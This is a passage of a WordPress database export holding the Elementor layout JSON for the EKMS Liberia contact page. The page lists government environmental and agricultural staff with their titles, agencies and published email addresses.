href=\\\"mailto:gendermedia1@gmail.com\\\">gendermedia1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcdddb1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"98f890d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c45b21c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"1205269\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ace9d4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"765a1b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6893e76\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"237d9e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d02417\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>N. Mamatu G. King <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:kingmamatu@gmail.com\\\">kingmamatu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9d523fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d8aba5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J. Josiah N. Domah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:josiahdomah@@gmail.com\\\">josiahdomah@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"be454e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b64ac2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Emmanuel Ballah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:ballah_@yahoo.com\\\">ballah_@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(24701,3656,'_elementor_edit_mode','builder'),(24702,3656,'_elementor_template_type','wp-page'),(24703,3656,'_elementor_version','3.0.16'),(24704,3656,'_wp_page_template','default'),(24705,3656,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"96ae29e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/jwiagbe.png\",\"id\":3633}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9ff3a4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/reeves.png\",\"id\":3635}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1c050c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/willabo.png\",\"id\":3636}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ddcc6df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/kullie.png\",\"id\":3637}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a688b4\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a 